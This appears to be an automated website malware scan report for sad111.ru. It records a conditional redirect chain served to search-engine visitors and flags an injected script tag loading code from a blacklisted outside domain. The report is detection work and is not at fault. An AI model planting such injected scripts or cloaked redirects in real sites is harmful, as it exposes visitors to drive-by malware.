Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://sad111.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: sad111.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: post-check=0, pre-check=0 Connection: close Date: Sun, 07 Sep 2014 15:20:26 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: Jino.ru/mod_pizza Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sun, 07 Sep 2014 15:20:26 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1410103226; expires=Mon, 08-Sep-2014 15:20:26 GMT; path=/ Set-Cookie: f987f111799e484667f33ab612c7f923=2c484f121ed31fb858712372c79c6984; path=/ | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 07 Sep 2014 15:20:27 GMT Pragma: no-cache Location: http://ling-kniga.ru/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Sun, 07 Sep 2014 15:20:27 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://sad111.ru/ | 200 OK Content-Length: 29235 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: turbooceanenergy.com <script type="text/javascript" src="http://turbooceanenergy.com/QSHxLAqi.php?id="></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" > <head> <link rel="stylesheet" href="/templates/template/css/template.css" type="text/css" /> <meta http-equiv="content-type" co ...[4681 bytes skipped]...
http://turbooceanenergy.com/QSHxLAqi.php?id= | 500 Can't connect to turbooceanenergy.com:80 (Bad hostname) Content-Length: 172 Content-Type: text/plain | clean |
http://turbooceanenergy.com/test404page.js | 500 Can't connect to turbooceanenergy.com:80 (Bad hostname) Content-Length: 172 Content-Type: text/plain | clean |
http://sad111.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://sad111.ru/modules/mod_accordion_menu/cache/25/e92052b368007ea225f5a68a413e8e7a.js | 200 OK Content-Length: 109735 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sad111.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sad111.ru/
Result: sad111.ru is not infected or malware details are not published yet.